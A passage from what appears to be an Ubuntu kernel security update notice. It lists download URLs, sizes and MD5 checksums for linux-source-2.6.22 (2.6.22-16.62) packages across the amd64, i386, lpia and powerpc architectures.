      Size/MD5:   462822 f18983bb8b9908ceaa0b4f4c02141842
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/usb-modules-2.6.22-16-generic-di_2.6.22-16.62_amd64.udeb
      Size/MD5:    71768 7d5256d104e125b8cc8f9f00bd3438b4
    http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.22/linux-image-2.6.22-16-rt_2.6.22-16.62_amd64.deb
      Size/MD5: 17594872 22ec2d30f05b84a913415d0699e375d2
    http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.22/linux-image-2.6.22-16-xen_2.6.22-16.62_amd64.deb
      Size/MD5: 17362524 26fc20e2732eb2330382d38fda25d538

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/acpi-modules-2.6.22-16-386-di_2.6.22-16.62_i386.udeb
      Size/MD5:    20410 c8b64fb73977ebca7ca1d35d29db52b9
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/acpi-modules-2.6.22-16-generic-di_2.6.22-16.62_i386.udeb
      Size/MD5:    23218 8a72c904d4deaded928c2ead3001d88f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/block-modules-2.6.22-16-386-di_2.6.22-16.62_i386.udeb
      Size/MD5:   211410 dbbfc026b80a838a181c25733319c1d3
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/block-modules-2.6.22-16-generic-di_2.6.22-16.62_i386.udeb
      Size/MD5:   213052 d5fe2bb56e30731ff8c79d9f07fa6814
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/cdrom-modules-2.6.22-16-386-di_2.6.22-16.62_i386.udeb
      Size/MD5:    89010 39dd6485cd6882186096b8551aa6f24d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/cdrom-modules-2.6.22-16-generic-di_2.6.22-16.62_i386.udeb
      Size/MD5:    35742 06e2836d3e7bb63395480f4d6cceec34
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/crypto-modules-2.6.22-16-386-di_2.6.22-16.62_i386.udeb
      Size/MD5:    50006 81bfe8d2094325edff0f10d8552657c9
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/crypto-modules-2.6.22-16-generic-di_2.6.22-16.62_i386.udeb
      Size/MD5:    50130 50ad3ccf228de24eb95ab7dede494549
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fat-modules-2.6.22-16-386-di_2.6.22-16.62_i386.udeb
      Size/MD5:    37958 d9bf177faf1feaaa393c934e7e1adfd3
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fat-modules-2.6.22-16-generic-di_2.6.22-16.62_i386.udeb
      Size/MD5:    38582 b6e5fee3f3f7db6192e63c55e666a9a7
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fb-modules-2.6.22-16-386-di_2.6.22-16.62_i386.udeb
      Size/MD5:    44946 a068922b73269e882b640e6a97dfe8d6
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fb-modules-2.6.22-16-generic-di_2.6.22-16.62_i386.udeb
      Size/MD5:    45214 7ef5cffe76b9639b5c92181bf90ceec1
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/firewire-core-modules-2.6.22-16-386-di_2.6.22-16.62_i386.udeb
      Size/MD5:    85314 8f1aba505ffb729acd45ee8bf088b6d0
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/firewire-core-modules-2.6.22-16-generic-di_2.6.22-16.62_i386.udeb
      Size/MD5:    85622 0716f54de6e1727d0cf881b03d8c3b2f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/floppy-modules-2.6.22-16-386-di_2.6.22-16.62_i386.udeb
      Size/MD5:    32334 f360324d0b85200b4a57948a30becc61
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/floppy-modules-2.6.22-16-generic-di_2.6.22-16.62_i386.udeb
      Size/MD5:    32644 172d6961511e5d3a4ad7048da6919791
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-core-modules-2.6.22-16-386-di_2.6.22-16.62_i386.udeb
      Size/MD5:   640724 38b5df462b11302b41896bd0eb22eeed
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-core-modules-2.6.22-16-generic-di_2.6.22-16.62_i386.udeb
      Size/MD5:   659234 c0587e20e5a0a7230f9af785266cddd0
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-secondary-modules-2.6.22-16-386-di_2.6.22-16.62_i386.udeb
      Size/MD5:   206132 34a59d6d775ddcf5971257ebe13aa92b
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-secondary-modules-2.6.22-16-generic-di_2.6.22-16.62_i386.udeb
      Size/MD5:   209792 d96eef56dc6427391c4ef8889e5ef463
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ide-modules-2.6.22-16-386-di_2.6.22-16.62_i386.udeb
      Size/MD5:    52646 83e5bac5f560c1193e24f3739ae9299e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ide-modules-2.6.22-16-generic-di_2.6.22-16.62_i386.udeb
      Size/MD5:    53868 f83471117d0bd36f48221e215bcc4d4f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/input-modules-2.6.22-16-386-di_2.6.22-16.62_i386.udeb
      Size/MD5:    55498 05982d3d503a87bdf683e632d3cb1ee1
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/input-modules-2.6.22-16-generic-di_2.6.22-16.62_i386.udeb
      Size/MD5:    56892 21cbb887abf007c735d99b6826b81158
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ipv6-modules-2.6.22-16-386-di_2.6.22-16.62_i386.udeb
      Size/MD5:   130918 797e9209d240fdc1f3b0e5bb7a754e40
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ipv6-modules-2.6.22-16-generic-di_2.6.22-16.62_i386.udeb
      Size/MD5:   137820 eb24b79c53f89536534ba9e074fb0c3d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/irda-modules-2.6.22-16-386-di_2.6.22-16.62_i386.udeb
      Size/MD5:   277838 6272fecdf7228fbcd42b5b50ad91abf0
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/irda-modules-2.6.22-16-generic-di_2.6.22-16.62_i386.udeb
      Size/MD5:   276356 8bf07bb7244ae396cde99d60e190758e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/kernel-image-2.6.22-16-386-di_2.6.22-16.62_i386.udeb
      Size/MD5:  1836146 cd1ae374961fb17f2c04843fc71e7af4
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/kernel-image-2.6.22-16-generic-di_2.6.22-16.62_i386.udeb
      Size/MD5:  1907580 afcd4f159b4c94a5aa208fe44398111a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-16-386_2.6.22-16.62_i386.deb
      Size/MD5:   581208 bfab84c8fc92611db7cba3b9746cc869
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-16-generic_2.6.22-16.62_i386.deb
      Size/MD5:   582962 c4ee8b88736dcb9a2195c14f8418ce83
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-16-rt_2.6.22-16.62_i386.deb
      Size/MD5:  1157186 4e40c14277606a89dee61a8980beddec
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-16-server_2.6.22-16.62_i386.deb
      Size/MD5:   582940 572d397f03ed6515478b217ca3201c3b
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-16-ume_2.6.22-16.62_i386.deb
      Size/MD5:   529424 74d63844910c2470cf49352c1e96dae9
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-16-virtual_2.6.22-16.62_i386.deb
      Size/MD5:   468902 6173446abb189698088fedba8859c1c6
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-16-xen_2.6.22-16.62_i386.deb
      Size/MD5:   925464 233e7833679e2700bded17c09ba8a6b2
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-16-386_2.6.22-16.62_i386.deb
      Size/MD5: 18575200 6eff2947bc2472ce5202dd23daec8cb2
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-16-generic_2.6.22-16.62_i386.deb
      Size/MD5: 18546994 5df51c3521cff094806b1d6527077b4b
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-16-server_2.6.22-16.62_i386.deb
      Size/MD5: 18633120 9aa8564231c29a49687202644c895e9a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-16-virtual_2.6.22-16.62_i386.deb
      Size/MD5:  6711326 2b37d2de2f53e65f5b75e24d667420e5
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-debug-2.6.22-16-386_2.6.22-16.62_i386.deb
      Size/MD5: 23490172 995012169c1f2b04216ea6289a4ff5df
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-debug-2.6.22-16-generic_2.6.22-16.62_i386.deb
      Size/MD5: 24139988 eb5017c0d66618781f9acc03e2727159
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-debug-2.6.22-16-server_2.6.22-16.62_i386.deb
      Size/MD5: 24402942 01e4b5d2daad83465ddaf93e94cdff31
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-image-debug-2.6.22-16-virtual_2.6.22-16.62_i386.deb
      Size/MD5: 22822218 77a9564672fd805631bfcc19a63a9137
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/linux-libc-dev_2.6.22-16.62_i386.deb
      Size/MD5:   655422 5e7d0d86928fbd1f6a12f56c54344384
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/md-modules-2.6.22-16-386-di_2.6.22-16.62_i386.udeb
      Size/MD5:   247862 08f207480b2edc146515ad3b4bd2be15
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/md-modules-2.6.22-16-generic-di_2.6.22-16.62_i386.udeb
      Size/MD5:   254830 2336f0eb587c71d94ec0d782adcf77f8
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/message-modules-2.6.22-16-386-di_2.6.22-16.62_i386.udeb
      Size/MD5:   137024 af60ba0071dc680b2109c292cbf6c8d8
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/message-modules-2.6.22-16-generic-di_2.6.22-16.62_i386.udeb
      Size/MD5:   137386 f1a747d759200486cf1b0670cb4a272f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nfs-modules-2.6.22-16-386-di_2.6.22-16.62_i386.udeb
      Size/MD5:   221082 0cea9bd7756b386c701f8093dd114e6e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nfs-modules-2.6.22-16-generic-di_2.6.22-16.62_i386.udeb
      Size/MD5:   228376 b07d5c3db7f746cca97acaf840c0d7c2
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-modules-2.6.22-16-386-di_2.6.22-16.62_i386.udeb
      Size/MD5:  1626878 93a14b12a2dcf0aa162163d171c23789
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-modules-2.6.22-16-generic-di_2.6.22-16.62_i386.udeb
      Size/MD5:  1647228 eb61975db04fb197e0b6bba6997276ab
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-pcmcia-modules-2.6.22-16-386-di_2.6.22-16.62_i386.udeb
      Size/MD5:   150380 914e42c577772a1b2535f842cbd2da7a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-pcmcia-modules-2.6.22-16-generic-di_2.6.22-16.62_i386.udeb
      Size/MD5:   142510 1833cfe6db88e9bea883993bf2502544
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-shared-modules-2.6.22-16-386-di_2.6.22-16.62_i386.udeb
      Size/MD5:   141088 b7f7e2facf42574f527b41134a5df981
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-shared-modules-2.6.22-16-generic-di_2.6.22-16.62_i386.udeb
      Size/MD5:   142492 791212b07b934422bca0cf79a25d87a1
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-usb-modules-2.6.22-16-386-di_2.6.22-16.62_i386.udeb
      Size/MD5:    79260 b8946f9e87c3cb89c9b3f6a0878fcfa4
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/nic-usb-modules-2.6.22-16-generic-di_2.6.22-16.62_i386.udeb
      Size/MD5:    80902 a3000efda486b423b5f5848c055fbc40
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/parport-modules-2.6.22-16-386-di_2.6.22-16.62_i386.udeb
      Size/MD5:    33330 963646359bfc411ff96ff7ffda50ac8b
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/parport-modules-2.6.22-16-generic-di_2.6.22-16.62_i386.udeb
      Size/MD5:    33860 45078f997eda70307452a18112d9c50e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pata-modules-2.6.22-16-386-di_2.6.22-16.62_i386.udeb
      Size/MD5:    37986 00bd1423084027087fd802bd7a679c3b
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pata-modules-2.6.22-16-generic-di_2.6.22-16.62_i386.udeb
      Size/MD5:    38252 d22f90ab3d2f0929e8c1640c09cb3995
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-modules-2.6.22-16-386-di_2.6.22-16.62_i386.udeb
      Size/MD5:    83208 e71578503bad051253d2d36178696d87
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-modules-2.6.22-16-generic-di_2.6.22-16.62_i386.udeb
      Size/MD5:    83418 6e6ca3ab7a97df98449d3701334d974a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-storage-modules-2.6.22-16-386-di_2.6.22-16.62_i386.udeb
      Size/MD5:    48214 3253ce729734e6a37b6924a70c761bfa
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/pcmcia-storage-modules-2.6.22-16-generic-di_2.6.22-16.62_i386.udeb
      Size/MD5:    48182 23b8b81044be816bd4bef7cc9b0827ea
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/plip-modules-2.6.22-16-386-di_2.6.22-16.62_i386.udeb
      Size/MD5:     8196 d7bdbccc64c5a48dbff4625cc0258f6a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/plip-modules-2.6.22-16-generic-di_2.6.22-16.62_i386.udeb
      Size/MD5:     8416 b9af21f038091ed2924954b528875721
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ppp-modules-2.6.22-16-386-di_2.6.22-16.62_i386.udeb
      Size/MD5:    50454 38bfec7d487a820e0933e2ac7f68adf9
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/ppp-modules-2.6.22-16-generic-di_2.6.22-16.62_i386.udeb
      Size/MD5:    52398 d3d1c409fc4ecd69b9b995e4c799cbdc
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/sata-modules-2.6.22-16-386-di_2.6.22-16.62_i386.udeb
      Size/MD5:    79478 79a6c9060de32919516df3213a9cbf74
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/sata-modules-2.6.22-16-generic-di_2.6.22-16.62_i386.udeb
      Size/MD5:    79806 67a22f50a9efce8702d15ed69f786c1f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/scsi-modules-2.6.22-16-386-di_2.6.22-16.62_i386.udeb
      Size/MD5:  1388032 5cf6a155cc0d5573cfa84f8751090ef1
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/scsi-modules-2.6.22-16-generic-di_2.6.22-16.62_i386.udeb
      Size/MD5:  1367420 a54880f85277f6cc9288592e560944e4
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/serial-modules-2.6.22-16-386-di_2.6.22-16.62_i386.udeb
      Size/MD5:    43000 72f44b25b9c90ed4fc2931efdff995e3
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/serial-modules-2.6.22-16-generic-di_2.6.22-16.62_i386.udeb
      Size/MD5:    42484 8526dfa7fe16a21214e534a75fd01d2e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/socket-modules-2.6.22-16-386-di_2.6.22-16.62_i386.udeb
      Size/MD5:    11280 11dc7f7fde6b5331555c4a0254ba129a
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/socket-modules-2.6.22-16-generic-di_2.6.22-16.62_i386.udeb
      Size/MD5:    11862 9ef81b40b14ed93278346896efc36b55
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/storage-core-modules-2.6.22-16-386-di_2.6.22-16.62_i386.udeb
      Size/MD5:   435640 489d2100f75e8062ffb5334083bb6105
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/storage-core-modules-2.6.22-16-generic-di_2.6.22-16.62_i386.udeb
      Size/MD5:   438816 84c0e12abce92839cfa94eca47099e7f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/usb-modules-2.6.22-16-386-di_2.6.22-16.62_i386.udeb
      Size/MD5:    65900 90d7a76d65760e4dd5d4ef33248a839f
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/usb-modules-2.6.22-16-generic-di_2.6.22-16.62_i386.udeb
      Size/MD5:    66796 3965c1500542ad312f499e8a6ad6e1b4
    http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.22/linux-image-2.6.22-16-rt_2.6.22-16.62_i386.deb
      Size/MD5: 18596510 0b0762aaede2e2c7f4083094980a8dba
    http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.22/linux-image-2.6.22-16-ume_2.6.22-16.62_i386.deb
      Size/MD5:  8653614 6bcb793bafbff45751cf7e13b37a3915
    http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.22/linux-image-2.6.22-16-xen_2.6.22-16.62_i386.deb
      Size/MD5: 17338736 2fe767bac5a4c7a71a0a8d326f8dafb5

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/l/linux-source-2.6.22/acpi-modules-2.6.22-16-lpia-di_2.6.22-16.62_lpia.udeb
      Size/MD5:    31560 bf7ecd68c2be27d9ad60893ddc346b45
    http://ports.ubuntu.com/pool/main/l/linux-source-2.6.22/block-modules-2.6.22-16-lpia-di_2.6.22-16.62_lpia.udeb
      Size/MD5:   174616 9cbfeb40e26cee0590cd39953e23b580
    http://ports.ubuntu.com/pool/main/l/linux-source-2.6.22/crypto-modules-2.6.22-16-lpia-di_2.6.22-16.62_lpia.udeb
      Size/MD5:    47540 f3d03cf26b8e1237435a80af5df586db
    http://ports.ubuntu.com/pool/main/l/linux-source-2.6.22/fat-modules-2.6.22-16-lpia-di_2.6.22-16.62_lpia.udeb
      Size/MD5:    34816 8975e6bfa57663ebcbe6ca22a2dc2a10
    http://ports.ubuntu.com/pool/main/l/linux-source-2.6.22/fb-modules-2.6.22-16-lpia-di_2.6.22-16.62_lpia.udeb
      Size/MD5:    25652 3567711880372842b80c50ec70769c43
    http://ports.ubuntu.com/pool/main/l/linux-source-2.6.22/firewire-core-modules-2.6.22-16-lpia-di_2.6.22-16.62_lpia.udeb
      Size/MD5:    78142 d5cff458287dffb5ec8d52700f24c84d
    http://ports.ubuntu.com/pool/main/l/linux-source-2.6.22/floppy-modules-2.6.22-16-lpia-di_2.6.22-16.62_lpia.udeb
      Size/MD5:    29636 13ecaa203b6b71f941e65200d5fc3872
    http://ports.ubuntu.com/pool/main/l/linux-source-2.6.22/fs-core-modules-2.6.22-16-lpia-di_2.6.22-16.62_lpia.udeb
      Size/MD5:   123432 7e1da83f461c2a5c2c11ef33d65518c8
    http://ports.ubuntu.com/pool/main/l/linux-source-2.6.22/fs-secondary-modules-2.6.22-16-lpia-di_2.6.22-16.62_lpia.udeb
      Size/MD5:    68580 102b17bcfea28dbc21d5f83dc6a9d56d
    http://ports.ubuntu.com/pool/main/l/linux-source-2.6.22/ide-modules-2.6.22-16-lpia-di_2.6.22-16.62_lpia.udeb
      Size/MD5:     1398 63c11069cfedf66dd2efac3491267956
    http://ports.ubuntu.com/pool/main/l/linux-source-2.6.22/input-modules-2.6.22-16-lpia-di_2.6.22-16.62_lpia.udeb
      Size/MD5:    50878 bdad79e9fb71dbed56601120544b48d9
    http://ports.ubuntu.com/pool/main/l/linux-source-2.6.22/ipv6-modules-2.6.22-16-lpia-di_2.6.22-16.62_lpia.udeb
      Size/MD5:   123344 efae43f39dd1c63f54ec9acb9399c181
    http://ports.ubuntu.com/pool/main/l/linux-source-2.6.22/irda-modules-2.6.22-16-lpia-di_2.6.22-16.62_lpia.udeb
      Size/MD5:   246232 a80a1df99458c23217df5e121e849137
    http://ports.ubuntu.com/pool/main/l/linux-source-2.6.22/kernel-image-2.6.22-16-lpia-di_2.6.22-16.62_lpia.udeb
      Size/MD5:  1536190 867524b5b73497e72a04ed932256587d
    http://ports.ubuntu.com/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-16-lpia_2.6.22-16.62_lpia.deb
      Size/MD5:   582888 a6564ca614c340a040c8b681ac4d9ba4
    http://ports.ubuntu.com/pool/main/l/linux-source-2.6.22/linux-headers-2.6.22-16-lpiacompat_2.6.22-16.62_lpia.deb
      Size/MD5:   597338 0d9e6be56b6200df75817f034bcbf21d
    http://ports.ubuntu.com/pool/main/l/linux-source-2.6.22/linux-image-2.6.22-16-lpia_2.6.22-16.62_lpia.deb
      Size/MD5:  8330670 b7f5d544edb76cff5841a54a26280ffe
    http://ports.ubuntu.com/pool/main/l/linux-source-2.6.22/linux-libc-dev_2.6.22-16.62_lpia.deb
      Size/MD5:   627684 71d0ab7913937a543b6cfa851782b000
    http://ports.ubuntu.com/pool/main/l/linux-source-2.6.22/message-modules-2.6.22-16-lpia-di_2.6.22-16.62_lpia.udeb
      Size/MD5:    46918 3beac9ba53d72b5b1af8a97b9354135a
    http://ports.ubuntu.com/pool/main/l/linux-source-2.6.22/nfs-modules-2.6.22-16-lpia-di_2.6.22-16.62_lpia.udeb
      Size/MD5:   206904 5f605b69647e36fc7983b8eba414fecd
    http://ports.ubuntu.com/pool/main/l/linux-source-2.6.22/nic-modules-2.6.22-16-lpia-di_2.6.22-16.62_lpia.udeb
      Size/MD5:   234170 c4b93dfad285e43b9a80bdcc0e435e3f
    http://ports.ubuntu.com/pool/main/l/linux-source-2.6.22/nic-shared-modules-2.6.22-16-lpia-di_2.6.22-16.62_lpia.udeb
      Size/MD5:   124144 0c0b9b849e58f54ea5c052dbdcedeaab
    http://ports.ubuntu.com/pool/main/l/linux-source-2.6.22/nic-usb-modules-2.6.22-16-lpia-di_2.6.22-16.62_lpia.udeb
      Size/MD5:    40318 c414bce736945921ae5b1a97be22bc20
    http://ports.ubuntu.com/pool/main/l/linux-source-2.6.22/parport-modules-2.6.22-16-lpia-di_2.6.22-16.62_lpia.udeb
      Size/MD5:    30658 52074fc0756c2322774d525f8f67b250
    http://ports.ubuntu.com/pool/main/l/linux-source-2.6.22/pata-modules-2.6.22-16-lpia-di_2.6.22-16.62_lpia.udeb
      Size/MD5:     3658 e23947e22f3125bd704c39f143649090
    http://ports.ubuntu.com/pool/main/l/linux-source-2.6.22/ppp-modules-2.6.22-16-lpia-di_2.6.22-16.62_lpia.udeb
      Size/MD5:    47236 07fe3cca2b8d81cbdd22e409472edd57
    http://ports.ubuntu.com/pool/main/l/linux-source-2.6.22/sata-modules-2.6.22-16-lpia-di_2.6.22-16.62_lpia.udeb
      Size/MD5:    15774 bf1a2ac7aef0851aee86cd2dad9e2291
    http://ports.ubuntu.com/pool/main/l/linux-source-2.6.22/scsi-modules-2.6.22-16-lpia-di_2.6.22-16.62_lpia.udeb
      Size/MD5:    96658 a0616218c0e07a6afb595cd3460e9c81
    http://ports.ubuntu.com/pool/main/l/linux-source-2.6.22/socket-modules-2.6.22-16-lpia-di_2.6.22-16.62_lpia.udeb
      Size/MD5:    10876 0f9f4d189453480566eab11dba577873
    http://ports.ubuntu.com/pool/main/l/linux-source-2.6.22/storage-core-modules-2.6.22-16-lpia-di_2.6.22-16.62_lpia.udeb
      Size/MD5:   377544 01099bbdcde91d65c57ac26e8ba19974
    http://ports.ubuntu.com/pool/main/l/linux-source-2.6.22/usb-modules-2.6.22-16-lpia-di_2.6.22-16.62_lpia.udeb
      Size/MD5:    52860 d643fe47a8e6675b13dcde9600e407ef
    http://ports.ubuntu.com/pool/universe/l/linux-source-2.6.22/linux-image-2.6.22-16-lpiacompat_2.6.22-16.62_lpia.deb
      Size/MD5: 18532096 13f61e4401788981078f123e4928fa7a

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/block-modules-2.6.22-16-cell-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:   315096 ef46120ff487dcc511ad06c8c67757a3
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/block-modules-2.6.22-16-powerpc-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:   331812 a37554e8dbabf975cedc08e134dcc4de
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/block-modules-2.6.22-16-powerpc64-smp-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:   310584 697e80ece374ec25fd25d198551e4682
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/crypto-modules-2.6.22-16-cell-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:    69096 7a863a20eadf0f4ce50e9d3fbf9b7854
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/crypto-modules-2.6.22-16-powerpc-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:    59596 de3a3dfd9293605197aa47f1d98fd8b2
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/crypto-modules-2.6.22-16-powerpc64-smp-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:    69116 cc04324e182dda5a0109ee8609894014
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fat-modules-2.6.22-16-cell-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:    47604 862c8dd1ed130977528eeb24ab239b48
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fat-modules-2.6.22-16-powerpc-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:    41300 0107f711ec395fc2b9aa1d54ad5139bf
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fat-modules-2.6.22-16-powerpc64-smp-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:    47614 24cab5be01ce8175a3e6d9e4ef308aec
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/firewire-core-modules-2.6.22-16-cell-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:   107314 8012a9fac3e9ea51159457de92f841eb
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/firewire-core-modules-2.6.22-16-powerpc-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:    91152 d9460ed65e9900a408b643d7062f5c5d
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/firewire-core-modules-2.6.22-16-powerpc64-smp-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:   107278 c31e3e76cf347c69de7cdb901aa0c190
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/floppy-modules-2.6.22-16-cell-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:    40960 346788940d158e2bf6563e5261793137
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/floppy-modules-2.6.22-16-powerpc-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:    44736 2f81dda07e98c39d6892ecc9b505e0c2
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/floppy-modules-2.6.22-16-powerpc64-smp-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:    40978 04ea8ca20169e997993459a9a70e2934
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-core-modules-2.6.22-16-cell-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:   773478 d302baa5ee1f678356a69658776a154e
    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.22/fs-core-modules-2.6.22-16-powerpc-di_2.6.22-16.62_powerpc.udeb
      Size/MD5:   709212 2daa06657b4b35ff70a3557b70732244
